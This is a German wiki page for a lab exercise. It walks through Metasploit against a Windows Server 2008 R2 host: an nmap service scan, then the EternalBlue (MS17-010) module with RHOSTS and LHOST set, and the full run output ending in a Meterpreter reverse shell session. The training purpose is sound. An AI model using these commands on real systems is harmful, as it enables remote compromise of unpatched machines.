Metasploit win2k8 Aufgaben: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 51: Zeile 51:
 
*set RHOSTS 10.0.10.107
 
*set RHOSTS 10.0.10.107
 
*set LHOST 10.0.10.101
 
*set LHOST 10.0.10.101
 +
*run
 +
<pre>
 +
[*] Started reverse TCP handler on 10.0.10.101:4444
 +
[*] 10.0.10.107:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
 +
[+] 10.0.10.107:445      - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
 +
[*] 10.0.10.107:445      - Scanned 1 of 1 hosts (100% complete)
 +
[+] 10.0.10.107:445 - The target is vulnerable.
 +
[*] 10.0.10.107:445 - Connecting to target for exploitation.
 +
[+] 10.0.10.107:445 - Connection established for exploitation.
 +
[+] 10.0.10.107:445 - Target OS selected valid for OS indicated by SMB reply
 +
[*] 10.0.10.107:445 - CORE raw buffer dump (51 bytes)
 +
[*] 10.0.10.107:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
 +
[*] 10.0.10.107:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
 +
[*] 10.0.10.107:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
 +
[*] 10.0.10.107:445 - 0x00000030  6b 20 31                                        k 1           
 +
[+] 10.0.10.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
 +
[*] 10.0.10.107:445 - Trying exploit with 12 Groom Allocations.
 +
[*] 10.0.10.107:445 - Sending all but last fragment of exploit packet
 +
[*] 10.0.10.107:445 - Starting non-paged pool grooming
 +
[+] 10.0.10.107:445 - Sending SMBv2 buffers
 +
[+] 10.0.10.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
 +
[*] 10.0.10.107:445 - Sending final SMBv2 buffers.
 +
[*] 10.0.10.107:445 - Sending last fragment of exploit packet!
 +
[*] 10.0.10.107:445 - Receiving response from exploit packet
 +
[+] 10.0.10.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
 +
[*] 10.0.10.107:445 - Sending egg to corrupted connection.
 +
[*] 10.0.10.107:445 - Triggering free of corrupted buffer.
 +
[*] Sending stage (201798 bytes) to 10.0.10.107
 +
[*] Meterpreter session 1 opened (10.0.10.101:4444 -> 10.0.10.107:49358) at 2024-08-28 09:58:43 -0400
 +
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 +
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 +
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 +
</pre>
 +
*meterpreter >

Version vom 28. August 2024, 13:59 Uhr

Starten von Metasploit

Erster Scan

  • db_nmap -sV -p- 10.0.10.107

Ergebnisse anzeigen

  • services
----         ----   -----  ----                  -----  ----
10.0.10.107  22     tcp    ssh                   open   OpenSSH 7.1 protocol 2.0
10.0.10.107  135    tcp    msrpc                 open   Microsoft Windows RPC
10.0.10.107  139    tcp    netbios-ssn           open   Microsoft Windows netbios-ssn
10.0.10.107  445    tcp    microsoft-ds          open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.10.107  3000   tcp    http                  open   WEBrick httpd 1.3.1 Ruby 2.3.3 (2016-11-21)
10.0.10.107  3306   tcp    mysql                 open   MySQL 5.5.20-log
10.0.10.107  3389   tcp    tcpwrapped            open
10.0.10.107  4848   tcp    ssl/http              open   Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
10.0.10.107  7676   tcp    java-message-service  open   Java Message Service 301
10.0.10.107  8009   tcp    ajp13                 open   Apache Jserv Protocol v1.3
10.0.10.107  8022   tcp    http                  open   Apache Tomcat/Coyote JSP engine 1.1
10.0.10.107  8031   tcp    ssl/unknown           open
10.0.10.107  8080   tcp    http                  open   Sun GlassFish Open Source Edition  4.0
10.0.10.107  8181   tcp    ssl/intermapper       open
10.0.10.107  8383   tcp    http                  open   Apache httpd
10.0.10.107  8443   tcp    ssl/https-alt         open
10.0.10.107  9200   tcp    wap-wsp               open
10.0.10.107  49152  tcp    msrpc                 open   Microsoft Windows RPC
10.0.10.107  49153  tcp    msrpc                 open   Microsoft Windows RPC
10.0.10.107  49154  tcp    msrpc                 open   Microsoft Windows RPC
10.0.10.107  49157  tcp                          open
10.0.10.107  49158  tcp    msrpc                 open   Microsoft Windows RPC

Erste Erkenntnis

Basierend auf den Nmap-Ergebnissen gibt es mehrere offene Ports auf der Windows Server 2008 R2 Maschine, die auf Dienste hinweisen, die Schwachstellen für SMB (Server Message Block) ausnutzen könnten. Die interessanten Ports für SMB sind in diesem Fall:

  • Port 139 (netbios-ssn)
  • Port 445 (microsoft-ds)

Beide Ports werden für SMB-Dienste verwendet, die häufig anfällig für Exploits wie EternalBlue (MS17-010) oder MS08-067 (NetAPI) sind. Diese Exploits sind bekannt dafür, dass sie eine Remotecodeausführung ermöglichen.

Suche

  • search MS17-010
Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

EternalBlue (MS17-010) Exploit überprüfen

Der MS17-010 (EternalBlue)-Exploit ist eine bekannte Schwachstelle in älteren Windows-Versionen, einschließlich Windows Server 2008 R2. Es handelt sich um eine Schwachstelle im SMBv1-Protokoll.

Anwenden

  • use exploit/windows/smb/ms17_010_eternalblue
  • set RHOSTS 10.0.10.107
  • set LHOST 10.0.10.101
  • run
[*] Started reverse TCP handler on 10.0.10.101:4444 
[*] 10.0.10.107:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.0.10.107:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 10.0.10.107:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.0.10.107:445 - The target is vulnerable.
[*] 10.0.10.107:445 - Connecting to target for exploitation.
[+] 10.0.10.107:445 - Connection established for exploitation.
[+] 10.0.10.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.10.107:445 - CORE raw buffer dump (51 bytes)
[*] 10.0.10.107:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.0.10.107:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard 
[*] 10.0.10.107:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.0.10.107:445 - 0x00000030  6b 20 31                                         k 1             
[+] 10.0.10.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.10.107:445 - Trying exploit with 12 Groom Allocations.
[*] 10.0.10.107:445 - Sending all but last fragment of exploit packet
[*] 10.0.10.107:445 - Starting non-paged pool grooming
[+] 10.0.10.107:445 - Sending SMBv2 buffers
[+] 10.0.10.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.10.107:445 - Sending final SMBv2 buffers.
[*] 10.0.10.107:445 - Sending last fragment of exploit packet!
[*] 10.0.10.107:445 - Receiving response from exploit packet
[+] 10.0.10.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.10.107:445 - Sending egg to corrupted connection.
[*] 10.0.10.107:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 10.0.10.107
[*] Meterpreter session 1 opened (10.0.10.101:4444 -> 10.0.10.107:49358) at 2024-08-28 09:58:43 -0400
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  • meterpreter >
Abgerufen von „http://wiki.ixheim.de/index.php?title=Metasploit_win2k8_Aufgaben&oldid=55891